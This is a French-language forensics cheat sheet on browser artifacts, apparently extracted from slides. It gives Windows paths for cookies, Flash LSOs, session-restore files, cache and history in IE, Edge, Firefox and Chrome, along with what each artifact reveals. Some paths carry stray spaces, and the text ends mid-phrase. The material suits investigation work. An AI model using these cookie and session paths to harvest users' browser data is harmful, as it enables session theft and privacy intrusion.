● Nombre de visites
● Les pages consultées lors de la session
● Les liens sortants
● Méthodes d’accès (depuis un e-mail, direct, depuis un autre site, Google AdWords)
● Mots-clés utilisés pour trouver le site web (si pas de SSL)
● Timestamp de création de cookie et la dernière fois qu’il a été utilisé
● Récupération de cookies supplémentaires (Google Analytics / Flash)
Google Analytics (GA) a développé une méthodologie très sophistiquée pour traquer les visites des sites webs et relever bon nombre de statistiques. De nos jours il est tellement répandu qu’il couvre 50% des sites web. Sur la totalité des sites web utilisant un système de tracking GA prend 80% de part de marché.
Les Local Stored Objects (LSOs) ou cookies flash ne sont plus très répandus du fait que Flash est en perte de vitesse de nos jours et les sites utilisant cette technologie se font de plus en plus rares.
Leur particularité est qu’ils n’ont pas de date d’expiration et les navigateurs ne possèdent pas de fonctions natives pour les supprimer.
● %APPDATA%\Roaming\Macromedia\FlashPlayer\#SharedObjects
● %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Cookies
● %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCookies
● %USERPROFILE%\AppData\Local\Packages\microsoft.microsoftedge _<APPID>\AC\MicrosoftEdge\Cookies
● %USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\<randomtext>.default\cookies.sqlite
● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\<rando mtext>.default\cookies.sqlite
● %USERPROFILE%\Local Settings\Application Data\Google\Chrome\UserData\Default\Local Storage\
● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Local Storage\
● Restauration des onglets ouverts après la fermeture du navigateur.
● Historique des sites vus depuis chaque onglet
● Timestamp des fermetures de sessions
● Timestamp de création des fichiers ‘.dat’ dans le répertoire Active
● Timestamp de modification des fichiers ‘.dat’ dans le répertoire LastActive
● Nombre de fois que l’onglet à été ouvert (seulement en cas de crash navigateur)
Fichiers à examiner sont Current Session, Current Tabs, Last Session, Last Tabs.
● %USERPROFILE%/AppData/Local/Microsoft/Internet Explorer/Recovery
● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\ <randomtext>.default\sessionstore.js
● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\
● Identification des sites web visités
● Fourni certain fichiers présents sur la page lors de la visite
● Ces fichiers sont triés selon les comptes locaux de la machine
● Les timestamps récupérables sont la première et la dernière visite
Le cache de navigation représente l’endroit où les composants d’un site internet sont stockés afin d’améliorer les performances lors de la navigation internet. Cela permet de prendre des timestamps et de connaître précisément l’activité en ligne de l’utilisateur à un moment donné.
● %USERPROFILE%\AppData\Local\Microsoft\Windows\Tempor aryInternet Files\Content.IE5
● %USERPROFILE%\AppData\Local\Microsoft\Windows\Tempor aryInternet Files\Content.IE5
● %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCac he\IE
● %USERPROFILE%\AppData\Local\Packages\microsoft.microsof tedge_<APPID>\AC\MicrosoftEdge\CacheFirefox
● %USERPROFILE%\Local Settings\ApplicationData\Mozilla\Firefox\Profiles\<randomtext >.default\Cache
● %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles\<randomte xt>.default\Cache
● %USERPROFILE%\Local Settings\Application Data\Google\Chrome\UserData\Default\Cache - data_#/af_######
● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Cache\ - data_#/f_######
● Enregistrement des sites internet visités classés par date.
● Stocké pour chaque utilisateur local.
● Enregistrement du nombre de visites (la fréquence)
● Log l’accès au système de fichiers
● %USERPROFILE%\AppData\Local\Microsoft\Windows\History\
● %USERPROFILE%\AppData\Local\Microsoft\Windows\WebCac he\WebCacheV*.dat
● %USERPROFILE%\ApplicationData\Mozilla\Firefox\Profiles\<ra ndomtext>.default\places.sqlite
● %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\ <randomtext>.default\places.sqlite
● %USERPROFILE%\Local Settings\Application Data\Google\Chrome\UserData\Default\History
● %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History
site pour le transfert